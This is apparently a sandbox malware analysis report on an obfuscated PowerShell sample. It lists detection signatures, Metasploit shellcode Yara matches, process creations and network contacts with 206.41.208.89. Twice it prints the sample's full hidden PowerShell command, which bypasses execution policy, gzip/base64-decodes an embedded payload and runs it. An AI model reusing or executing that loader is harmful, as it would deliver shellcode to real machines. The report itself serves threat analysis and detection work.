Windows Analysis Report
x6bjOrKFQn.ps1

Overview

General Information

Sample name: x6bjOrKFQn.ps1
renamed because original name is a hash value
Original sample name: bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740.ps1
Analysis ID: 1542797
MD5: b2cc4f57ccfdb79e1f65bdcc203afecb
SHA1: 56be6d9cfc79e265765f4fa4a13a34f422c28c94
SHA256: bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740
Tags: 206-41-208-89ps1user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Avira: detection malicious, Label: TR/Rozena.Gen
Source: x6bjOrKFQn.ps1 ReversingLabs: Detection: 26%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Joe Sandbox ML: detected
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View IP Address: 206.41.208.89 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DF92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001FDE66200CA 0_2_000001FDE66200CA
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.winPS1@8/15@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: x6bjOrKFQn.ps1 ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
